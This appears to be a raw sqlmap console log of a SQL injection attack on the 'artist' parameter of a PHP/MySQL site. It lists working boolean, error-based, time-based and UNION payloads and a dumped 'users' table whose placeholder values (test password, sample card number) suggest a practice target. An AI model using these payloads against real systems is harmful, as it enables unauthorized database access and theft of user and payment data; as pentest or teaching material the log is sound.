        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.2#stable}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:29:45 /2025-05-19/

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 2511=2511

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: artist=1 AND GTID_SUBSET(CONCAT(0x716a787a71,(SELECT (ELT(9573=9573,1))),0x71786a6a71),9573)

    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)
    Payload: artist=1 RLIKE (SELECT 1840 FROM (SELECT(SLEEP(5)))vqGz)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7133 UNION ALL SELECT CONCAT(0x716a787a71,0x64704464745542766f66637575616c4e484c5273495775716b787a494a744261455576475a4f4a49,0x71786a6a71),NULL,NULL-- -
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8

Database: acuart
Table: users
[1 entry]
+---------------------+----------------------------------+------+-----------------+---------+-------+------------+-----------+
| cc                  | cart                             | pass | email           | phone   | uname | name       | address   |
+---------------------+----------------------------------+------+-----------------+---------+-------+------------+-----------+
| 1234-5678-2300-9000 | 732cf94289ca59e4ddc96ae7bd412e0c | test | email@email.com | 2323345 | test  | John+Smith | 21+street |
+---------------------+----------------------------------+------+-----------------+---------+-------+------------+-----------+


[*] ending @ 10:29:53 /2025-05-19/
